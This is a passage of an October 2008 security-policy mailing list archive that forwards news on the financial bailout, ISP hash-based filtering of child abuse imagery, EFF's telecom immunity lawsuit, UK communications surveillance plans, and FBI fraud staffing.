to S?dwestrundfunk reporter Kai Laufen, who discovered the operation. I'm sending him the "I Spotted the Fed" tee-shirt I took home from DefCon 7. From rforno at infowarrior.org Tue Oct 14 11:42:30 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 14 Oct 2008 07:42:30 -0400 Subject: [Infowarrior] - It's Wall Street's Turn to Bolster Confidence Message-ID: <9A976785-C1C6-4CBA-84B9-2D737C3BF6A3@infowarrior.org> (I would agree with Steve's sentiment except for the last paragraph - yes, the bipartisan 'national leadership' did come, but it was too little too late, in my view. Huge rallies like yesterday are to be sold into, not bought, for cash is still king in such volatile periods of intense uncertainty.....FWIW, despite yesterday's rally, I still say we're nowhere near being out of the woods on a variety of economic fronts. ---rf) It's Wall Street's Turn to Bolster Confidence By Steven Pearlstein Tuesday, October 14, 2008; D01 http://www.washingtonpost.com/wp-dyn/content/article/2008/10/13/AR2008101302586_pf.html Now, what was that about Hank Paulson having blown it? How he foolishly let Lehman Brothers go under and started a chain reaction that quickly turned into a financial meltdown? How he was so focused on his cockamamie plan to buy up distressed mortgages and mortgage-backed securities, instead of injecting capital into banks in exchange for shares? How he and the other finance ministers were so way behind the curve this past weekend in failing to come up with a detailed and coordinated plan to restore confidence in financial markets? The truth is we were going to have a serious financial crisis no matter what Paulson did or didn't do, thanks to the incredible ineptitude of Wall Street and the nation's financial regulators over the past few years, whether an insolvent and mismanaged investment bank was rescued or not. Lehman was the veritable straw that finally broke the back of the financial camel overloaded with debt. If it hadn't been Lehman, it would have been something else. Since Lehman's failure, Paulson has moved faster, more aggressively and more deftly than any of his international counterparts in doing whatever was necessary to stabilize the financial system. Yesterday, he and his collaborators at the Fed and FDIC threw everything they had at it -- flooding the banking system with an unlimited supply of dollars, expanding deposit insurance, putting a guarantee on new bank debt, injecting capital into healthy banks, giving the Japanese the assurances they needed to rescue Morgan Stanley, and doing nothing to discourage free-spending Democrats from their plans to offer another big economic stimulus plan. The result: the biggest one-day rally on stock markets in 70 years. I hope you won't think it petty to point out that some of the people who this past weekend were complaining that the Treasury secretary was being too timid in his response to the financial crisis were some of the same people who, three weeks ago, were complaining about his audacity in demanding a "$700 billion blank check." I know I speak for Gov. Sarah Palin and Joe Six-Packs everywhere in pleading that, for Pete's sake, let's cut the guy a little slack. In putting several trillion dollars in government funds on the line, the country has now done just about everything that Wall Street could have asked to address the financial crisis. The question now, as John Kennedy might have put it, is what Wall Street is ready to do for its country. So far, the answer is not much. After getting their closed-door briefing yesterday from Paulson on the government's latest initiatives, Wall Street's finest literally ran from the Treasury to their waiting limousines, bypassing a media scrum eager to convey any scrap of wisdom or insight. Court reporters will tell you they can always tell the innocent from the guilty on these kinds of perp walks, and the Wall Street crowd yesterday looked particularly guilty, unable even to conjure up a soothing word to a nation fretting over its shrunken 401(k)s, or a simple thank you to taxpayers for having saved their bacon. Their silence and invisibility throughout this crisis attests to the moral and political bankruptcy of a financial elite that is the perfect match for the financial bankruptcy they have now visited upon their investors, their creditors and their customers. After yesterday's "historic" meeting, we are told by industry apologists that we are supposed to be grateful to nine leading banks for having "volunteered" to accept additional capital from the Treasury, along with a government guarantee for newly issued bank debt, even if it means having to accept a dilution of existing shares and a few harmless restrictions on their operations. Pardon me if I'm less than blown over by this munificent offer, but it hardly seems commensurate either with the severity of the current crisis or the depth of the banks' culpability in fomenting it. If Wall Street were truly serious about convincing Main Street that we're all in this together, its top executives would have stepped before the cameras yesterday and promised not to cut lines of credits to long-standing business customers who have never missed a payment. They would have committed themselves not to foreclose on any homeowner who is willing and able to refinance into a new, government- guaranteed, fixed-rate mortgage set at 85 percent of the current value of the property. They would have offered to suspend dividend payments until capital levels had been restored to pre-crisis levels. They would have given us their solemn promise not to advise clients to hold on to their own investments while quietly dumping whatever they can from their own portfolios and shorting every security in sight. With the Treasury now desperate for help in managing its new rescue efforts, they would have volunteered, at no cost to taxpayers, the services of some of those investment bankers and financial wizards who now don't have much else to do. And the maharajas of finance could have set a wonderful example if they had all gotten together and agreed to work for a dollar a year until the crisis has passed. There's a word that captures the instinct to take these kind of bold moves in the midst of a national crisis -- it's called leadership. We've seen quite a bit of it these past few weeks from public officials like Hank Paulson, Ben Bernanke, Tim Geithner, Sheila Bair, Nancy Pelosi, Barney Frank, John Boehner -- even George Bush. Wall Street, by contrast, has served up a nothing sandwich, a lack of leadership that's been stunning. From rforno at infowarrior.org Fri Oct 17 01:41:15 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 16 Oct 2008 21:41:15 -0400 Subject: [Infowarrior] - ISPs pressed to become child porn cops Message-ID: <17739543-E18C-4679-A05B-38965A88C3D3@infowarrior.org> http://www.msnbc.msn.com/id/27198621/ New law, new monitoring technology raise concerns about privacy By Bill Dedman and Bob Sullivan msnbc updated 4:40 p.m. ET, Thurs., Oct. 16, 2008 ISPs pressed to become child porn cops New technologies and changes in U.S. law are adding to pressures to turn Internet service providers into cops examining all Internet traffic for child pornography. One new tool, being marketed in the U.S. by an Australian company, offers to check every file passing through an Internet provider's network ? every image, every movie, every document attached to an e- mail or found in a Web search ? to see if it matches a list of illegal images. The company caught the attention of New York's attorney general, who has been pressing Internet companies to block child porn. He forwarded the proposal to one of those companies, AOL, for discussion by an industry task force that is looking for ways to fight child porn. A copy of the company's proposal was also obtained by msnbc.com. Privacy advocates are raising objections to such tools, saying that monitoring all traffic would be an unconstitutional invasion. They say companies can't start watching every customer's activity, and blocking files thought to be illegal, even when the goal is as noble as protecting children. But such monitoring just became easier with a law approved unanimously by the Congress and signed on Monday by President Bush. A section of that law written by Republican presidential candidate Sen. John McCain gives Internet service providers access to lists of child porn files, which previously had been closely held by law enforcement agencies and the National Center for Missing and Exploited Children. Although the law says it doesn't require any monitoring, it doesn't forbid it either. And the law ratchets up the pressure, making it a felony for ISPs to fail to report any "actual knowledge" of child pornography. That actual knowledge could be handed to the Internet companies by technologies like the one proposed by the Australian company, Brilliant Digital Entertainment Ltd. Known as CopyRouter, the software would let ISPs compare computer files ? movies, photographs and documents ? against those lists. Banned files would be blocked, and the requestor would receive a substitute file provided by law enforcement, such as a warning message: "The material you have attempted to access has been identified as child pornography." The attempt to send or receive the file could then be reported to law enforcement, along with the Internet Protocol address of the requestor. The CopyRouter relies on a controversial new technology called "deep packet inspection," which allows Internet companies to analyze in real time the river of data flowing through their networks. The pipeline would know what was passing through it. You can read more about this technology in Bob Sullivan's Red Tape Chronicles. Child porn foes give proposal to AOL A PowerPoint slide show from Brilliant Digital Entertainment describing the technology was passed on to AOL last month by two powerful forces in the fight against child porn: the office of New York Attorney General Andrew M. Cuomo, who has been calling out ISPs that won't agree to block sites with illegal images, and Ernest E. Allen, the president and CEO of the National Center for Missing and Exploited Children, a nonprofit given by Congress a central role in the fight. When msnbc.com inquired about the proposal, both Cuomo's office and Allen said they were not promoting the technology, merely passing it along to a committee of Internet service providers and software companies as part of "brainstorming" on new technologies to detect illegal images. One of the leading experts on electronic privacy in the U.S. says the proposal would clearly run afoul of the U.S. Constitution, essentially setting up a wiretap without obtaining permission from a judge. "This would be plainly illegal in the United States, whether or not a governmental official imposed this on an ISP or the ISP did this voluntarily," John Morris of the Center for Democracy and Technology said after viewing Brilliant Digital's slide show. "If I were the general counsel of an ISP, I wouldn't touch this with a 10-foot pole." A spokesman for Brilliant Digital Entertainment disputed that, saying the technology would be "non-invasive," would not compromise privacy, would be legal in the U.S. and elsewhere, and most important, would curtail the global proliferation of child pornography. "I don't think it takes many voices before the Internet industry separates out those who are prepared to build a business on the trafficking of child sexual exploitation," said Michael Speck, Brilliant Digital's commercial manager in charge of law enforcement products. "If boxes started turning up with Pablo Escobar's special- delivery cocaine inside, they'd stop it, they'd do something about it." How it would work Here's how CopyRouter would work, according to the company's slide show: # A law enforcement agency would make available a list of files known to contain child pornography. Such files are commonly discovered in law enforcement raids, in undercover operations and in Internet searches that start with certain keywords (such as "pre-teens hard core"). Police officers have looked at those files, making a judgment that the children are clearly under age and that the files are illegal in their jurisdiction, before adding them to the list. Each digital file has a unique digital signature, called a hash value, that can be recognized no matter what the file is named, and without having to open the file again. The company calls this list of hash values its Global File Registry. # Whenever an Internet user searched the Web, attached a file to an e- mail or examined a menu of files using file-sharing software on a peer- to-peer network, the software would compare the hash values of those files against the file registry. It wouldn't be "reading" the content of the files ? it couldn't tell a love note from a recipe ? but it would determine whether a file is digitally identical to one on the child-porn list. # If there were no match, the file would be provided to the user who requested it. But if there were a match, transmission of the file would be blocked. The users would instead receive another image or movie or document, containing only a warning screen. The makers of CopyRouter claim that it can even be used to defeat encryption and compression of files in the Internet's Wild West: the peer-to-peer file-sharing tools such as Gnutella and BitTorrent. Many people use those file-sharing systems for legal traffic, such as independent artists distributing their music, or software developers sharing open- source code. But others use them for illegal traffic in copyrighted music and movies. They also are popular for distributing adult pornography, which is legal, and child pornography, which is not. Can software fool encryption schemes? Encrypted files on the peer-to-peer network could not be decrypted by CopyRouter, but the company claims it can fool the sender's computer into believing that the recipient was requesting an unencrypted and uncompressed file. The slide show calls this "special handling." This is done by changing the underlying protocol settings that establish how the sender and recipient exchange the file. This trickery, unknown to either the sender or recipient, would make it possible for CopyRouter to see the underlying files, calculate a hash value and compare the files to the list of illegal files, Brilliant Digital says. A photo of the company's first test machine can be found online, in the online photos of the company's systems architect, Norberto "Beto" Meijome, author of the PowerPoint presentation. Meijome's portfolio of online photos on Flickr includes photos of his Cisco SCE router on the day he unpacked and installed it, Sept. 11, 2007. He labels the SCE router "the new toy." Brilliant Digital Entertainment has a complicated past. Its subsidiary, Altnet, made news in 2002, when its software shipped with the Kazaa file swapping software, then heir to Napster?s throne as the favored way for file swappers to illicitly trade music. Altnet's program was designed to use unused bandwidth and processing power of Kazaa users for such uses as paid advertising and promotions for commercial products. The company claimed that this activity only occurred if the customer allowed it, but some antivirus firms labeled the software as spyware. Later, Altnet was sued by the recording industry for its role in helping spread the popularity of Kazaa. After settling a lawsuit with the music industry, Brilliant Digital decided to approach file sharing from a new direction, selling products designed to help copyright holders protect their intellectual property. It now describes itself as a "significant online provider of licensed film and music content." Seeking allies to move the new product to market Now the company wants to expand into a new product line: fighting child porn. "We have been working on it for some time," Speck said in a telephone interview from Australia. "We've been in negotiations with ISPs and law enforcement agencies and content owners." Speck said he previously led the anti-piracy organization of the Australian sound recording industry. Now he's lining up meetings in the U.S. next month with Internet providers and the National Center for Missing and Exploited Children. In advance of his trip to the U.S., Speck spoke with the staff of Andrew Cuomo, whose New York attorney general's office has been pressuring Internet service providers to fight child porn. In June, Cuomo announced he was investigating ISPs, using a modern version of the public stocks to encourage cooperation. He set up a Web site listing Internet providers around the nation that made the changes he demanded, as well as "ISPs that have failed to make the same commitment to stop child porn." Cuomo, who was recently cited by McCain as one Democrat he would like to appoint to federal office, has urged Internet service providers to block access to child porn news groups and "purge their servers of child porn Web sites." Speck had a conference call in September with Cuomo's staff, which he said gave him a blunt description of the legal and privacy landscape in the U.S. "We'd be grateful for any assistance in getting this to the relevant ISPs and law enforcement agencies, and making any adjustments necessary," Speck said, recounting the conversation with Cuomo's staff. "It was made very clear that, for this to be a viable law enforcement tool, this would have to operate within the legislative framework within the country." After talking with Speck, Cuomo's office passed the proposal on to John D. Ryan, AOL's senior vice president, deputy general counsel and head of its public safety and criminal investigations unit. Ryan received the slide show on Sept. 18, the day before attorneys from Cuomo's office arrived at AOL's headquarters in Virginia to discuss new technologies to fight child porn. Both Cuomo's office and AOL said that the CopyRouter was not discussed explicitly during what was described as a brainstorming session. ?We have nothing to do with this technology? "We have not pressured anyone to use this technology," said a Cuomo spokesman, Matthew Glazer. "We have nothing to do with this technology." At the same time, AOL's Ryan received a copy of the slide show from the National Center for Missing and Exploited Children. Known as NCMEC, this private nonprofit organization has an increasing role in the law enforcement effort against child porn, and receives more than $35 million in taxpayer funds each year. NCMEC and Cuomo's office have worked together this year on the child-porn fight, holding a joint press conference to announce Cuomo's Web site. Ryan also has close ties to NCMEC, serving as a member of the board of directors and as leader of its industry Technology Coalition on child porn. Members of that group also include Yahoo, Microsoft, Google and others. (Msnbc.com is a joint venture of Microsoft and NBC Universal.) AOL officials said they did not feel pressured by Cuomo or NCMEC to adopt any particular technology, adding that the company has a long history of fighting child porn on its own initiative. "The relationship with the attorney general is positive and partnering," Ryan said. AOL's has a system of its own AOL officials told msnbc.com that they already examine some files for child porn, block access to those files, and provide evidence to law enforcement. That system (called image detection filtering protocol) apparently is based on the same general principle as CopyRouter, comparing the hash values of files to a known list. But there are significant differences between the two approaches. AOL checks files uploaded as attachments to e-mail against a list of files that AOL has identified as child porn. If the file matches one on its list, the sender is led to believe that the file has been sent, but it has not. AOL's methods have been shared with other Internet service providers. But AOL officials said a device like the CopyRouter would be more extensive and more efficient for two reasons: AOL checks only e-mail attachments, not Web searches or other Internet traffic, and its home- grown list of banned files is much shorter than the lists compiled by law enforcement and NCMEC. "The library of hash values that AOL has, has been derived over time, completely in house from reports from users and files we've stumbled upon," said Christopher G. Bubb, an AOL assistant general counsel in the public safety and criminal investigations unit. "So it's not a government list. Courts have likened it to citizen provided information." Government role would be problematic That distinction is important. Internet service providers could be considered agents of law enforcement if they began comparing files to a list provided by the police and intercepting traffic by substituting a legal file for an illegal one. The Fourth Amendment to the U.S. Constitution forbids unreasonable search and seizure by the government. Courts have held that Internet service providers are within their rights to examine the traffic that flows through their pipeline ? as they must do, for example, to combat spam ? because the scrutiny is being done by a company, not the government. Although they said they could not pass judgment on software proposed by any vendor, the AOL officials suggested that Brilliant Digital's proposal might not work in the U.S., at least not without Congress providing ISPs more legal cover. ""Keep in mind that this is developed in a totally different cultural and legal regime. The Australian legal system is quite different from an American legal system," said Ryan, the AOL executive. "It would raise concerns. ... Would we be deemed an agent of the government?" ?Not an intelligence-gathering tool? Speck, the Brilliant Digital official, argued that CopyRouter would not put ISPs in a law enforcement role because the list of banned files would be managed by the law enforcement agency, not handed over to the private companies. CopyRouter would consult that list, but at arm's length from the companies. "The responsibility is shifted to law enforcement," Speck said. "We've delivered to Internet service providers something they've called for. ... This is not an intelligence-gathering tool. This is not for developing a list of users. This is an extension of what routers already do." But wouldn't the Internet service provider know which traffic CopyRouter had blocked, and which user had sent or attempted to download it? No, Speck said, because his company's product would be a neutral middleman, not sharing information with the ISP or law enforcement. "All hashes are provided to Global File Registry, which manages a secure data base and communications channel between law enforcement agencies and the ISP such that the illicit file hashes targeted by law enforcement remain private and secure to the relevant law enforcement agency," he said in an e-mail after the interview. "There is no personal (sender/receiver) information identified, and privacy is maintained." The company's slide show, however, does describe information on users being passed directly to law enforcement. Any files that matched the child porn list would be reported to a "law enforcement data collector," along with IP addresses identifying the user's computer. The slide show says, "Any hits here will generate a 'red' report, which will be routed to the police collector server ONLY. These reports contain full IP information." Although Brilliant Digital says no law enforcement agency has signed on to the CopyRouter plan, that hasn't kept the company from including a familiar blue seal in its slide show. At each point when a law enforcement computer is depicted, it bears a mark that closely resembles the FBI logo. Only when the logo is magnified can one see that it says "Friendly Bus Investigator" rather than "Federal Bureau of Investigation." The FBI hasn't signed on to the plan, Speck said, and the logo was not meant to imply any endorsement. The FBI met a hailstorm of criticism in 2000 when the existence of its Carnivore project was revealed. The packet-sniffing technology was used to monitor and log traffic when installed at an Internet service provider. The FBI by 2005 had stopped using the technology, in favor of commercial tools. New law may take law enforcement out of the loop Under the new U.S. law, a system like CopyRouter might not require involvement of law enforcement. The McCain portion of the new child- porn law allows such a system to be set up by the Internet service providers, because it gives them access to those lists of illegal files. The key player in that transfer is the National Center for Missing and Exploited Children. Although it's a nonprofit organization, NCMEC has increasingly taken on law enforcement roles, with Congress requiring that complaints of child pornography be sent to its CyberTipline. Since 1998, NCMEC says, it has received more than 300,000 reports from ISPs. And it gives them a daily list of Internet addresses that appear to host child porn, so the companies can choose to block those Web pages. The new law authorizes NCMEC to go further, handing to Internet service providers the list of files judged to be child porn. Law enforcement agencies give those hash values to NCMEC, which will be allowed (but not required) to give them to the ISPs. That cooperation would allow the ISPs to use CopyRouter or their own home-grown solutions, without including cops in the loop directly. That provision was part of the SAFE Act, a bill introduced by Sen. McCain and Democratic Sen. Chuck Schumer of New York. A McCain aide called the bill a "NCMEC wish list." The SAFE Act also made it a felony for ISPs to fail to report child porn, if they discover it, with penalties up to $300,000 for each instance. McCain's bill got caught in a tug-of-war with a broader bill written by another player in the presidential election, Sen. Joe Biden, the Democratic vice presidential candidate. Biden's solution leaned more toward law enforcement, giving more money to the Justice Department and state Internet Crimes Against Children task forces, which investigate child pornography. With NCMEC lined up behind McCain's bill, and other child protection activists (and Oprah Winfrey) pushing for Biden's bill, Congress finally passed them both: McCain bill was folded into the Biden bill, which passed the House and Senate without objection. Republicans were able to cut the spending in the Biden bill, down to $300 million. With the new law in place, NCMEC has a plan for ISPs to use their new access to the hash values. "We believe that there needs to be more proactive, voluntary methods to identify illegal child pornography content that bring it to their attention," said Allen, the NCMEC president. "We are working with leading ISPs to do that." He said NCMEC's Hash Sharing System would share with Internet service providers information on only the " worst of the worst" images of child pornography. An image must depict a pre-pubescent child who has been identified by law enforcement. And it must depict one of the following: "oral, vaginal or anal penetration and/or sexual contact involving a child whether it be genital, digital, or a foreign object; an animal involved in some form of sexual behavior with a child; or lewd or lascivious exhibition of the genitalia or anus. " "Through this project, NCMEC is also working with the members of the Technology Coalition to test existing software and develop new technologies that will enable ISPs to identify apparent child pornography images by hash value and block them," Allen wrote in an e- mail. Some ISPs willing to police copyright law The idea of turning Internet service providers into cops has been opposed and embraced by different ISPs in a different realm ? copyright protection. The recording and movie industries have pressed ISPs to monitor their customers to detect traffic copyright violations. AT&T has said it hopes to monitor for pirated content, and has been in discussions with content companies, including NBC Universal (co-owner of msnbc.com), which has pushed for such filtering. Microsoft (the other co-owner of msnbc.com) has said it opposes filtering by ISPs. ISPs also have run into public and government opposition just for slowing down, not blocking, some Internet traffic. The Federal Communications Commission ruled in August, on a 3-2 vote, that Comcast's limiting of BitTorrent traffic was illegal. Comcast said it was merely trying to keep the flood of peer-to-peer file sharing from slowing down the Internet for everyone else. As for CopyRouter, the company's manager said it would not slow down Internet traffic noticeably, because it's not inspecting the contents of files, merely comparing their hash values to a list, which can be done quickly. Privacy advocates have already raised objections to deep-packet inspection. Earlier this year, a California company named NebuAd proposed a service that would observe Web surfers? Internet habits through machines installed at ISPs, then inject context-sensitive advertising into the Web sites the consumers visited. It called the system "Behavioral Targeting." Public outcry and rumblings of an investigation from Congress led firms considering the technology to pull out. Morris, of the Center for Democracy and Technology, said Brilliant Digital's plan constitutes an illegal wiretap, and would run afoul of the Electronic Communications Privacy Act. No firm can listen in on private communications unless it is instructed to do so by a law enforcement official with a proper court order, he said. ?Enormous First Amendment problems? Even then, no government agency ? even a law enforcement agency or state attorney general's office ? could impose a requirement to stop all files on a blacklist, or otherwise create a list of forbidden content, Morris said. Such a list would not pass constitutional muster. "You can't declare speech, or images, illegal without judicial proceedings," Morris said. "... That creates enormous First Amendment problems. You can't have an agency or outside firm acting as judge and jury on these images." Also, blocking images before they were delivered would constitute a prior restraint of communication, Morris said, violating the First Amendment right of free speech. Other methods used to combat child porn ? logging IP addresses of frequent senders and investigating them, by using a subpoena to force ISPs to reveal the name, and then knocking on the user's door ? raise no such constitutional issues, Morris said. He compared that to a law enforcement official overhearing illegal speech in a public place and prosecuting a speaker. Brilliant Digital's scheme, he said, is more like picking up a telephone and listening in on private conversations. "As horrible as child pornography is, and it is horrible, you still have to follow the Constitution," Morris said. At NCMEC, Allen said the privacy interests are being heard. "We have been very sensitive to legitimate free speech and privacy-related concerns. That is one of the reasons we are focusing exclusively on pre-pubescent children and the most egregious images. That does not suggest that child pornography images involving 13-year-old children are acceptable or less serious, however, traditional law enforcement investigation and prosecution efforts are being used for those situations." A different approach Another child protection group has a different approach. The National Association to Protect Children, which advised Sen. Biden on his bill, said that blocking of files by Internet service providers could easily be seen by the public as "overreaching," making it harder to get public support for efforts of law enforcement. What's needed, said the group's executive director, Grier Weeks, is for cops to investigate the leads they already have. "The Department of Justice and all 50 attorneys general are sitting on a mountain of evidence leading straight to the doors of child pornography traffickers," Weeks said. "We could rescue hundreds of thousands of child sexual assault victims tomorrow in America, without raising any constitutional issues whatsoever. But government simply won't spend the money to protect these children. Instead of arrests by the Federal Bureau of Investigation, the child exploitation industry now faces Internet pop-ups from the Friendly Bus Investigators. That was always the fundamental difference between the Biden bill and the McCain bill. Biden wanted to fund cops to rescue children. McCain wanted to outsource the job." Sen. McCain's general counsel, Lee C. Dunn, said that he's happy that both the law enforcement and technology approaches became law, that his focus was on protecting children. She said the new law does not require any Internet provider to monitor traffic. "They have the responsibility and their right to manage the network as they wish," Dunn said. "If AOL wants to monitor their network for child porn, some customers may go to them, because they'll keep them from getting this stuff showing up in their e-mail. Other companies may choose not to, and other people may prefer that. We're not dictating to them that they monitor their network." Brilliant Digital Entertainment is betting that most internet companies will choose to monitor their customers. Michael Speck said his company's product pitches have been well received by law enforcement agencies, government officials and Internet service providers. "I don't think there's anyone in the Internet space," Speck said, "who doesn't think fighting child sexual exploitation is good business." ? 2008 msnbc.com URL: http://www.msnbc.msn.com/id/27198621/ From rforno at infowarrior.org Fri Oct 17 11:35:36 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 17 Oct 2008 07:35:36 -0400 Subject: [Infowarrior] - EFF Challenging Telcom Immunity Message-ID: <54ABB33C-4863-4813-BD20-C90C12F69D65@infowarrior.org> http://www.eff.org/press/archives/2008/10/17 October 17th, 2008 EFF Challenges Constitutionality of Telecom Immunity in Federal Court Unconstitutional Law Cannot Shut Courthouse Door on Americans' Privacy Claims San Francisco - The Electronic Frontier Foundation (EFF) Thursday challenged the constitutionality of a law aimed at granting retroactive immunity to telecommunications companies that participated in the president's illegal domestic wiretapping program. In a brief filed in the U.S. District Court in San Francisco, EFF argues that the flawed FISA Amendments Act (FAA) violates the federal government's separation of powers as established in the Constitution and robs innocent telecom customers of their rights without due process of law. Signed into law earlier this year, the FAA allows for the dismissal of the lawsuits over the telecoms' participation in the warrantless surveillance program if the government secretly certifies to the court that either the surveillance did not occur, was legal, or was authorized by the president. Attorney General Michael Mukasey filed that classified certification with the court last month. "The immunity law puts the fox in charge of the hen house, letting the Attorney General decide whether or not telecoms like AT&T can be sued for participating in the government's illegal warrantless surveillance," said EFF Senior Staff Attorney Kevin Bankston. "In our constitutional system, it is the judiciary's role as a co-equal branch of government to determine the scope of the surveillance and rule on whether it is legal, not the executive's. The Attorney General should not be allowed to unconstitutionally play judge and jury in these cases, which affect the privacy of millions of Americans." In the public version of his certification to the court, Attorney General Mukasey asserted that the government had no "content-dragnet" program that searched for keywords in the body of communications. However, the government did not deny the dragnet acquisition of the content of communications. In support of its opposition, EFF provided the court with a summary of thousands of pages of documents demonstrating the broad dragnet surveillance of millions of innocent Americans' communications. Eight volumes of exhibits accompanied the detailed summary, including eyewitness accounts and testimony under oath. "We have overwhelming record evidence that the domestic spying program is operating far outside the bounds of the law," said EFF Senior Staff Attorney Kurt Opsahl. "Intelligence agencies, telecoms, and the Administration want to sweep this case under the rug, but the Constitution won't permit it." EFF is representing the plaintiffs in Hepting v. AT&T, a class action lawsuit brought on behalf of millions of AT&T customers whose private domestic communications and communications records were illegally handed over to the National Security Agency (NSA). EFF has been appointed co-coordinating counsel along with the American Civil Liberties Union (ACLU) for all 47 of the outstanding lawsuits concerning the government's warrantless surveillance program. The constitutional challenge is set to be heard on December 2. For the full brief: http://www.eff.org/files/filenode/att/opposition101608.pdf For the summary of evidence: http://www.eff.org/files/filenode/att/section1006summary101608_0.pdf For more on the NSA spying: http://www.eff.org/issues/nsa-spying Contacts: Kevin Bankston Senior Staff Attorney Electronic Frontier Foundation bankston at eff.org Kurt Opsahl Senior Staff Attorney Electronic Frontier Foundation kurt at eff.org From rforno at infowarrior.org Sat Oct 18 02:14:43 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 17 Oct 2008 22:14:43 -0400 Subject: [Infowarrior] - UK gov outlines national comms surveillance plan Message-ID: Government gives more detail on communications surveillance plan OUT-LAW News, 16/10/2008 http://www.out-law.com//default.aspx?page=9515 The Government has postponed planned legislation which could create a giant central database containing records of every email, web session and phone call made in the UK. The Government said before summer that it would create new communications legislation that would make the recording of the fact of communications, though not their content, compulsory. It has emerged that that law had been planned for the end of this year but will now be postponed until next year following consultation. Government sources have told reporters that one option is to create a single, Government-operated database of call and web use records but that there would be a public consultation on measures before the law is passed. The Government has announced that any law would extend the powers of communications logging so that they could track the use of communications through websites such as social networking sites. Law enforcement agencies can currently gain access to records kept by telecoms providers about which number or computer contacted which other number or computer, for how long and when as well as any location data that the operator has. Providers are compensated by the state for the costs of providing such information. One current Home Office proposal, sources have told reporters, is that a single public database would track and provide that information. Home Secretary Jacqui Smith told think-tank the Institute for Public Policy Research yesterday that the Government would act on communications surveillance and would extend the reach into new forms of communication. "Our ability to intercept communications and obtain communications data is vital to fighting terrorism and combating serious crime, including child sex abuse, murder and drugs trafficking," said Smith. "Communications Data ? that is, data about calls, such as the location and identity of the caller, not the content of the calls themselves ? is used as important evidence in 95% of serious crime cases and in almost all Security Service operations since 2004." "But the communications revolution has been rapid in this country and the way in which we intercept communications and collect communications data needs to change too. If it does not we will lose this vital capability that we currently have and that we all take for granted," she said. Authorities' use of information on phone calls and web use is possible because companies track usage data for billing purposes. That is not true of alternative messaging systems such as internet-based phone technology or social networking messaging and the Government is said to be keen to track such use. The changes will be part of the Data Communications Bill, which will also transpose into UK law the EU's Data Retention Directive. This asks member states to make it a legal requirement that communications records are kept for between six and 24 months, though it does not require that the information be kept on a Government database. Privacy watchdog the Information Commissioner's Office (ICO) said earlier this year that it opposed the creation of a new single database containing communications records. ?If the intention is to bring all mobile and internet records together under one system, this would give us serious concerns and may well be a step too far," said Jonathan Bamford, assistant Information Commissioner. "We are not aware of any justification for the state to hold every UK citizen?s phone and internet records." Smith said that a consultation on the new law would take place in the New Year. From rforno at infowarrior.org Sun Oct 19 01:56:13 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 18 Oct 2008 21:56:13 -0400 Subject: [Infowarrior] - The Atlantic Magazine article on TSA Follies Message-ID: <01C396F7-CD5D-48D9-A1B9-CA32712DC885@infowarrior.org> November 2008 Airport security in America is a sham??security theater? designed to make travelers feel better and catch stupid terrorists. Smart ones can get through security with fake boarding passes and all manner of prohibited items?as our correspondent did with ease. < - > http://www.theatlantic.com/doc/200811/airport-security From rforno at infowarrior.org Sun Oct 19 02:01:16 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 18 Oct 2008 22:01:16 -0400 Subject: [Infowarrior] - Vatican joins INTERPOL Message-ID: Vatican a member of Interpol after unanimous vote Richard Owen in Rome http://www.timesonline.co.uk/tol/comment/faith/article4901449.ece It may be one of the world's smallest states and have one of the world's smallest police forces, but the Vatican was today admitted "by unanimous vote" as Interpol's 187th member at the organisation's General Assembly, held in St Petersburg. Interpol's acting President, Arturo Herrera Verdugo, handed an Interpol flag to the secretary-general of the governorate of Vatican City, Bishop Renato Boccardo. Monsignor Boccardo said the Holy See was joining Interpol because it "shared its views on dealing with global challenges". The Vatican set up new anti terrorism units earler this year. Although the Vatican plays down terrorist threats it has stepped up security, with visitors to St Peter's Basilica required to pass through metal detectors. Its 160 strong security force, the Vatican corps of gendarmes, is staffed entirely by Italians. The gendarme corps is distinct from the Swiss Guard, the Pope's personal protection force, but works closely with it. Domenico Giani, the corps commander, said the Holy See was also considering a new "agreement of cooperation with Italian police," due to the "upsurge in criminal activity". The duties of the Vatican gendarme corps include border control, crime prevention and investigation, and the enforcement of financial regulations. It was founded in 1816 by Pope Pius VII. From rforno at infowarrior.org Sun Oct 19 13:46:50 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 19 Oct 2008 09:46:50 -0400 Subject: [Infowarrior] - F.B.I. Struggles to Handle Wave of Financial Fraud Cases Message-ID: <755D76D2-FD49-4436-90FD-9C4D3EB53776@infowarrior.org> October 19, 2008 F.B.I. Struggles to Handle Wave of Financial Fraud Cases By ERIC LICHTBLAU, DAVID JOHNSTON and RON NIXON http://www.nytimes.com/2008/10/19/washington/19fbi.html?_r=2&hp=&oref=slogin&pagewanted=print&oref=slogin WASHINGTON ? The Federal Bureau of Investigation is struggling to find enough agents and resources to investigate criminal wrongdoing tied to the country?s economic crisis, according to current and former bureau officials. The bureau slashed its criminal investigative work force to expand its national security role after the Sept. 11 attacks, shifting more than 1,800 agents, or nearly one-third of all agents in criminal programs, to terrorism and intelligence duties. Current and former officials say the cutbacks have left the bureau seriously exposed in investigating areas like white-collar crime, which has taken on urgent importance in recent weeks because of the nation?s economic woes. The pressure on the F.B.I. has recently increased with the disclosure of criminal investigations into some of the largest players in the financial collapse, including Fannie Mae and Freddie Mac. The F.B.I. is planning to double the number of agents working financial crimes by reassigning several hundred agents amid a mood of national alarm. But some people inside and out of the Justice Department wonder where the agents will come from and whether they will be enough. So depleted are the ranks of the F.B.I.?s white-collar investigators that executives in the private sector say they have had difficulty attracting the bureau?s attention in cases involving possible frauds of millions of dollars. Since 2004, F.B.I. officials have warned that mortgage fraud posed a looming threat, and the bureau has repeatedly asked the Bush administration for more money to replenish the ranks of agents handling nonterrorism investigations, according to records and interviews. But each year, the requests have been denied, with no new agents approved for financial crimes, as policy makers focused on counterterrorism. According to previously undisclosed internal F.B.I. data, the cutbacks have been particularly severe in staffing for investigations into white-collar crimes like mortgage fraud, with a loss of 625 agents, or 36 percent of its 2001 levels. Over all, the number of criminal cases that the F.B.I. has brought to federal prosecutors ? including a wide range of crimes like drug trafficking and violent crime ? dropped 26 percent in the last seven years, going from 11,029 cases to 8,187, Justice Department data showed. ?Clearly, we have felt the effects of moving resources from criminal investigations to national security,? said John Miller, an assistant director at the F.B.I. ?In 